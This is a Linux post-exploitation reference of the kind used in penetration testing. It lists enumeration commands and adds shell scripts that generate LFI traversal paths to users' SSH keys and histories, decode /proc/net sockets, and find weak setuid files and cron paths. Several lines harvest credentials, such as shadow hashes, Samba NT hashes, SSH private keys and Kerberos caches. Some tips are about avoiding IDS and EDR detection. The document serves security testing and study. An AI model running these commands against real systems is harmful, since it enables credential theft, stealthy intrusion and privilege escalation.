Linux Post Exploitation Command List

Collecting Information

Blind Files

Things to pull when all you can do is blindly read, as in an LFI or directory traversal bug. Don't forget %00: a trailing null byte cuts off a suffix the application appends (such as ".php"), but only on old PHP (before 5.3.4), so try each path with and without it.

/etc/resolv.conf
    Current name servers (DNS) for the system. World-readable, and reading it is less likely to trigger IDS alerts than /etc/passwd.

/etc/motd
    Message of the day.

/etc/issue
    Pre-login banner, normally the distro and version (but often customised).

/etc/passwd
    List of local users, with their home directories and shells.

/etc/shadow
    Users' password hashes (requires root, or membership of the shadow group).

/home/xxx/.bash_history
    Shell history of a user taken from /etc/passwd; gives directory and command context, and sometimes credentials typed on the command line.
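Worked example, added here and not part of the original list: once /etc/passwd has come back through a blind read, this turns it into the next set of paths to request through the same primitive. SAMPLE_PASSWD, the function names and the traversal depth are my own constructions, not anything taken from a target.

```shell
#!/bin/sh
# Added example (not part of the original cheat sheet). Turn a blindly read
# /etc/passwd into the next files worth requesting through the same LFI.

# Constructed sample of what a blind read of /etc/passwd might return.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
backup:x:34:34:backup:/var/backups:/bin/false'

# interactive_users: stdin is passwd content; prints "user:home" for accounts
# with a login shell. nologin/false/sync-style shells never leave a history.
interactive_users() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ && $6 != "" { print $1 ":" $6 }'
}

# blind_targets: stdin is "user:home" pairs; prints the per-user files that
# leak context or credentials and are worth a blind read attempt.
blind_targets() {
    while IFS=: read -r user home; do
        for f in .bash_history .zsh_history .mysql_history .viminfo \
                 .ssh/id_rsa .ssh/id_ed25519 .ssh/authorized_keys; do
            printf '%s/%s\n' "$home" "$f"
        done
    done
}

# lfi_encode PATH: the traversal form of PATH, with and without a trailing
# %00. The null byte only truncates an appended suffix on PHP < 5.3.4, so a
# target that rejects one form may accept the other. Depth (6) is a guess.
lfi_encode() {
    rel=${1#/}
    printf '../../../../../../%s\n' "$rel"
    printf '../../../../../../%s%%00\n' "$rel"
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_PASSWD" | interactive_users | blind_targets
lfi_encode /etc/resolv.conf
```

Feed the real passwd content in on stdin instead of SAMPLE_PASSWD; the traversal depth usually has to be tuned per target, and a request that works without %00 should be preferred since the null byte is a strong IDS signature.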

System

uname -a
    Kernel version, architecture, hostname, sometimes the distro.

ps aux
    List all running processes.

top -b -n 1
    One batch-mode snapshot of the process list (-n is the number of iterations, not lines; -d sets the delay between them).

id
    Current user, uid/gid and groups.

arch, uname -m
    Kernel processor architecture.

w
    Who is logged in and what they are running, plus uptime and load average.

who -a
    Uptime, runlevel, ttys, login processes, etc.

gcc -v
    Returns the version of GCC (is there a compiler to build with?).

mysql --version
    Returns the version of MySQL.

perl -v
    Returns the version of Perl.

ruby -v
    Returns the version of Ruby.

python --version
    Returns the version of Python (also try python3 --version).

java -version
    Returns the version of Java.

jps -l
    Lists running JVMs with their main class or jar (JDK tool).

df -k
    Mounted filesystems, size, % used, device and mount point.

mount
    Mounted filesystems with their mount options (look for nosuid, noexec, ro).

last -a
    Last users logged on (from /var/log/wtmp), source host in the last column.

lastcomm
    Last commands executed; needs process accounting (acct/psacct) to be enabled.

lastlog
    Most recent login of every account (/var/log/lastlog).

lastlogin
    BSD equivalent of lastlog.

getenforce
    Status of SELinux (Enforcing, Permissive or Disabled).

dmesg
    Kernel ring buffer: hardware, drivers, module loads and errors since boot. Unprivileged reads fail when kernel.dmesg_restrict=1.

lspci
    Prints all PCI buses and devices.

lsusb
    Prints all USB buses and devices.

lscpu
    Prints CPU information.

lshw
    Lists hardware information.

cat /proc/cpuinfo, cat /proc/meminfo
    The same CPU and memory details straight from procfs.

du -h --max-depth=1 /
    Disk usage per top-level directory. Note: causes heavy disk I/O and is slow and noisy on a large filesystem.

which nmap
    Locate a command in $PATH (e.g. nmap or nc).

locate bin/nmap, locate bin/nc
    Same, from the locate database (only as fresh as the last updatedb run).

Networking

hostname -f
    Fully qualified hostname.

ip addr show
    Interfaces and addresses (iproute2).

ip ro show
    Routing table (iproute2).

ifconfig -a
    All interfaces, including those that are down (legacy net-tools).

route -n
    Routing table, numeric (legacy net-tools).

cat /etc/network/interfaces
    Static interface configuration on Debian/Ubuntu.

iptables -L -n -v
    Filter table rules, numeric, with packet/byte counters (root).

iptables -t nat -L -n -v
    NAT table: port forwards and masquerading.

ip6tables -L -n -v
    IPv6 rules; often forgotten and more permissive than the IPv4 set.

iptables-save
    Dumps every table in one go (root). On nftables hosts use nft list ruleset instead.

netstat -anop
    All sockets, numeric, with owning PID/program and timers; PIDs of other users' sockets only show as root.

netstat -r
    Routing table.

netstat -nltupw
    Listening TCP and UDP sockets plus raw sockets (-w); again, root is needed to see which process owns other users' sockets.

arp -a
    ARP cache, i.e. hosts recently talked to on the local segment (ip neigh on iproute2-only systems).

lsof -nPi
    Open network connections per process, without DNS or port-name resolution.

cat /proc/net/*
    More discreet: everything the commands above show can be read from the files under /proc/net (tcp, tcp6, udp, arp, route, dev, ...), which avoids running netstat/ss/lsof that auditing or EDR may flag (cat will complain about the subdirectories; harmless). Addresses and ports are hex, IPv4 addresses little-endian, and only the current network namespace is shown.
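Worked example, added here and not part of the original list: decoding /proc/net/tcp by hand, which is what the quiet approach above needs once netstat is off the table. The sample content is constructed and the function names are mine. Only IPv4 (/proc/net/tcp and /proc/net/udp) is handled; tcp6/udp6 use 32-hex-digit addresses and need a different decoder.

```shell
#!/bin/sh
# Added example (not part of the original cheat sheet): decode /proc/net/tcp
# without netstat/ss. Columns: sl local_address rem_address st ... uid ...
# Addresses are hex; IPv4 bytes are little-endian, ports big-endian.

# Constructed sample in the real file's layout (three sockets).
SAMPLE_PROC_NET_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   106        0 19001 1 0000000000000000 100 0 0 10 0
   2: 0F02000A:A3F2 5E8A3D0D:01BB 01 00000000:00000000 02:000003E8 00000000  1000        0 21877 1 0000000000000000 20 4 30 10 -1'

# tcp_state HEX: state code (include/net/tcp_states.h) to its name.
tcp_state() {
    case $1 in
        01) echo ESTABLISHED ;; 02) echo SYN_SENT ;;   03) echo SYN_RECV ;;
        04) echo FIN_WAIT1 ;;   05) echo FIN_WAIT2 ;;  06) echo TIME_WAIT ;;
        07) echo CLOSE ;;       08) echo CLOSE_WAIT ;; 09) echo LAST_ACK ;;
        0A) echo LISTEN ;;      0B) echo CLOSING ;;    *)  echo "UNKNOWN($1)" ;;
    esac
}

# hex2sock AAAAAAAA:PPPP -> a.b.c.d:port  (e.g. 0100007F:0016 -> 127.0.0.1:22)
hex2sock() {
    h=${1%%:*}; p=${1##*:}
    b1=$(printf '%s' "$h" | cut -c1-2); b2=$(printf '%s' "$h" | cut -c3-4)
    b3=$(printf '%s' "$h" | cut -c5-6); b4=$(printf '%s' "$h" | cut -c7-8)
    printf '%d.%d.%d.%d:%d\n' "$((0x$b4))" "$((0x$b3))" "$((0x$b2))" "$((0x$b1))" "$((0x$p))"
}

# decode_proc_net_tcp: stdin is /proc/net/tcp (or udp) content; prints
# "STATE local remote uid=N" per socket. uid is the socket owner, which
# tells you whose process to go looking for.
decode_proc_net_tcp() {
    while read -r sl laddr raddr st rest; do
        [ "$sl" = "sl" ] && continue        # header line
        uid=$(printf '%s\n' "$rest" | awk '{ print $4 }')
        printf '%-12s %-22s %-22s uid=%s\n' \
            "$(tcp_state "$st")" "$(hex2sock "$laddr")" "$(hex2sock "$raddr")" "$uid"
    done
}

# Demo: the constructed sample, then the live file when it is readable.
printf '%s\n' "$SAMPLE_PROC_NET_TCP" | decode_proc_net_tcp
if [ -r /proc/net/tcp ]; then decode_proc_net_tcp < /proc/net/tcp; fi
```

The inode column (field 6 of the remainder) can be matched against /proc/<pid>/fd/* symlinks ("socket:[inode]") to tie a socket to a process without lsof, at the cost of readdir on every /proc/<pid>/fd you are allowed to see.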

User Accounts

cat /etc/passwd
    Local accounts.

cat /etc/shadow
    Password hashes on Linux (root).

/etc/security/passwd
    Password hashes on AIX.

cat /etc/group
    Groups (group password hashes live in /etc/gshadow).

getent passwd
    Dumps every account from every source: local files, LDAP, NIS, whatever nsswitch.conf is configured with.

getent group
    Same for groups.

pdbedit -L -w
    Samba's own password database in smbpasswd format, including the NT hashes; pdbedit -L -v gives the verbose per-account view.

cat /etc/aliases
    Mail aliases (where does root's mail go?). Also try find /etc -name aliases and getent aliases.

ypcat passwd
    Displays the NIS password map.

Obtain users' information

ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*            # you can learn a lot from shell history
find /home/*/.vnc /home/*/.subversion -type f 2>/dev/null
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
cat /home/*/.mysql_history
sudo -l                        # lists the caller's own sudo rules even when /etc/sudoers is not readable (may prompt for a password)
crontab -l
sudo -p 'prompt'               # -p sets the password prompt text; handy when wrapping sudo in an alias or shell script

Credentials

/home/*/.ssh/id*
    SSH private keys (id_* without .pub), often passwordless.

/tmp/krb5cc_*
    Kerberos credential caches (tickets); reusable by pointing KRB5CCNAME at the file.

/tmp/krb5.keytab
    Kerberos keytab: long-term keys, not tickets. Check /etc/krb5.keytab too, which is where the system keytab normally lives.

/home/*/.gnupg/secring.gpg
    PGP private keys (GnuPG 2.0 and earlier; 2.1+ stores them under .gnupg/private-keys-v1.d/).

Configs

ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null    # world-writable files under /etc
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo "$user"; crontab -u "$user" -l; done 2>/dev/null    # lists every user's crontab (root)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

uname -a
    Often hints at it pretty well (Debian, Ubuntu and RHEL-family kernels carry the distro name in the version string).

lsb_release -d
    Generic command for all LSB distros (the lsb-release package is not always installed).

/etc/os-release
    Generic for distros using systemd; look at PRETTY_NAME, ID and VERSION_ID.

/etc/issue
    Generic but often modified.

cat /etc/*release
    Catches most of the distro-specific files below in one go.

/etc/SUSE-release
    Novell SUSE (newer SUSE releases rely on /etc/os-release).

/etc/redhat-release, /etc/redhat_version
    Red Hat (CentOS, Rocky and AlmaLinux ship it too, next to their own file).

/etc/fedora-release
    Fedora

/etc/slackware-release, /etc/slackware-version
    Slackware

/etc/debian_release, /etc/debian_version
    Debian (Ubuntu has debian_version as well; use os-release to tell them apart)

/etc/mandrake-release
    Mandrake

/etc/sun-release
    Sun JDS

/etc/release
    Solaris/SPARC

/etc/gentoo-release
    Gentoo

/etc/arch-release
    Arch Linux (the file is empty; its presence is the hint)

arch
    OpenBSD; sample output: "OpenBSD.amd64"

Installed Packages

RPM-based (Red Hat, Fedora, SUSE):
  * rpm -qa --last | head          # most recently installed first
  * yum list installed
Debian/Ubuntu:
  * dpkg -l
  * dpkg -l | grep -i "linux-image"   # installed kernels
  * dpkg --get-selections
{Free,Net}BSD: pkg_info (pkg info on modern FreeBSD)
Solaris: pkginfo
Gentoo: cd /var/db/pkg/ && ls -d */*    # always works
Arch Linux: pacman -Q

Package Sources

cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf

Finding Important Files

ls -dlR */
ls -alR | grep ^d
find /var -type d
ls -dl $(find /var -type d)
ls -dl $(find /var -type d) | grep -v root
find /var ! -user root -type d -ls
find /var/log -type f -exec ls -la {} \;
find / -perm -4000 -type f 2>/dev/null      # all setuid files
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
tree /home
ls -la /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep '\.tar$'      # remember to updatedb before running locate
locate tgz | grep '\.tgz$'
locate sql | grep '\.sql$'
locate settings | grep '\.php$'
locate config.inc | grep '\.php$'
ls /home/*/.ssh/id*
locate .properties | grep '\.properties$'   # java config files
locate .xml | grep '\.xml$'                 # java/.net config files
find /sbin /usr/sbin /opt /lib $(echo "$PATH" | sed 's/:/ /g') -perm /6000 -ls   # setuid/setgid binaries
locate rhosts
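Worked example, added here and not part of the original list, built around the two setuid searches above: enumerate setuid/setgid files and diff them against a baseline of the ones the distro is expected to ship, so only the odd ones need a closer look. BASELINE, the fixture tree and the function names are my own constructions.

```shell
#!/bin/sh
# Added example (not part of the original cheat sheet): list setuid/setgid
# files and flag the ones not in a known-good baseline.

# Constructed baseline. A real one comes from a clean host with the same
# package set (find / -perm -4000 -type f on a freshly installed box).
BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount'

# find_suid ROOT: regular files under ROOT with setuid or setgid set, sorted.
# "-perm -4000 -o -perm -2000" is the portable spelling of "-perm /6000".
find_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# unexpected_suid ROOT: find_suid output minus anything whose path relative
# to ROOT is listed in BASELINE. What is left is the review list: custom
# binaries, leftovers in /opt, /tmp, /home, vendor agents.
unexpected_suid() {
    root=$1
    find_suid "$root" | while read -r f; do
        case $root in
            /) rel=$f ;;
            *) rel=${f#"${root%/}"} ;;
        esac
        if ! printf '%s\n' "$BASELINE" | grep -qxF "$rel"; then
            printf '%s\n' "$f"
        fi
    done
}

# make_fixture: a throwaway tree with one expected and one unexpected setuid
# file, so the functions can be exercised without touching the real system.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/usr/bin" "$fx/opt/app"
    : > "$fx/usr/bin/passwd"; chmod 4755 "$fx/usr/bin/passwd"   # in baseline
    : > "$fx/usr/bin/ls";     chmod 0755 "$fx/usr/bin/ls"       # no special bits
    : > "$fx/opt/app/helper"; chmod 4755 "$fx/opt/app/helper"   # not in baseline
    printf '%s\n' "$fx"
}

# Demo on the fixture; on a real host run: unexpected_suid /
fx=$(make_fixture)
unexpected_suid "$fx"
rm -rf "$fx"
```

A baseline match only says the path is expected, not that the binary is the packaged one; follow up with rpm -V / dpkg -V (or debsums) on anything that matters, and check the mount options from the System section, since a setuid file on a nosuid mount is inert.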

What jobs are scheduled? (Cronjobs)

crontab -l 2>/dev/null
ls -alh /var/spool/cron 2>/dev/null
ls -al /etc/ | grep cron 2>/dev/null
ls -al /etc/cron* 2>/dev/null
cat /etc/cron* 2>/dev/null
cat /etc/at.allow 2>/dev/null
cat /etc/at.deny 2>/dev/null
cat /etc/cron.allow 2>/dev/null
cat /etc/cron.deny 2>/dev/null
cat /etc/crontab 2>/dev/null
cat /etc/anacrontab 2>/dev/null
cat /var/spool/cron/crontabs/root 2>/dev/null
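Worked example, added here and not part of the original list: after collecting the crontabs above, the next question is whether any scheduled command points at something you can write. The crontab text and the directory tree it is checked against are constructed and the function names are mine. The check uses the world-writable mode bit rather than test -w so that it gives the same answer whether run as root or not; group-writable paths and files owned by a non-root user deserve the same look.

```shell
#!/bin/sh
# Added example (not part of the original cheat sheet): find cron jobs whose
# command paths are world-writable, or missing from a world-writable
# directory (the job's user will run whatever gets dropped there).

# Constructed /etc/crontab-style content (system crontab: a user field
# precedes the command). Paths refer to the fixture built below.
SAMPLE_CRONTAB='# /etc/crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   root    /opt/backup/backup.sh --full
@reboot         root    /usr/bin/env sh /tmp/cleanup.sh
*/5 *   * * *   www-data /usr/bin/php /var/www/app/cron.php'

# cron_abs_paths: stdin is crontab text; prints "user path" for every
# absolute path in a job. Handles @reboot-style lines (user is field 2).
cron_abs_paths() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
    grep -v '^[A-Za-z_][A-Za-z0-9_]*=' |
    awk '{ s = ($1 ~ /^@/) ? 3 : 7; u = ($1 ~ /^@/) ? $2 : $6
           for (i = s; i <= NF; i++) if ($i ~ /^\//) print u, $i }'
}

# world_writable PATH: true when the others-write bit is set.
world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]
}

# cron_weak_paths ROOT: stdin is crontab text; ROOT is prepended to each
# path (empty for the live system). Prints one line per weak path.
cron_weak_paths() {
    root=${1:-}
    cron_abs_paths | while read -r user path; do
        full="$root$path"
        if [ -e "$full" ]; then
            if world_writable "$full"; then
                printf 'WRITABLE %s (job runs as %s)\n' "$path" "$user"
            fi
        else
            dir=$(dirname "$full")
            if [ -d "$dir" ] && world_writable "$dir"; then
                printf 'MISSING %s in writable dir (job runs as %s)\n' "$path" "$user"
            fi
        fi
    done
}

# make_cron_fixture: throwaway tree matching SAMPLE_CRONTAB.
make_cron_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/opt/backup" "$fx/usr/bin" "$fx/tmp" "$fx/var/www/app"
    : > "$fx/opt/backup/backup.sh"; chmod 0777 "$fx/opt/backup/backup.sh"  # weak
    : > "$fx/usr/bin/env";          chmod 0755 "$fx/usr/bin/env"
    : > "$fx/usr/bin/php";          chmod 0755 "$fx/usr/bin/php"
    : > "$fx/var/www/app/cron.php"; chmod 0644 "$fx/var/www/app/cron.php"
    chmod 0777 "$fx/tmp"   # /tmp/cleanup.sh is absent; its directory is writable
    printf '%s\n' "$fx"
}

# Demo on the fixture. Live: cat /etc/crontab /etc/cron.d/* | cron_weak_paths
fx=$(make_cron_fixture)
printf '%s\n' "$SAMPLE_CRONTAB" | cron_weak_paths "$fx"
rm -rf "$fx"
```

Relative commands (run-parts, scripts called by bare name) resolve through the crontab's PATH= line, so a writable directory early in that PATH is the same problem in a different place; the parser above only reports absolute paths and leaves that case to a manual look.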

The following one-liner lists the processes running as root, the permissions of the binary behind every running process (a writable one is an easy escalation), and the NFS exports.

echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
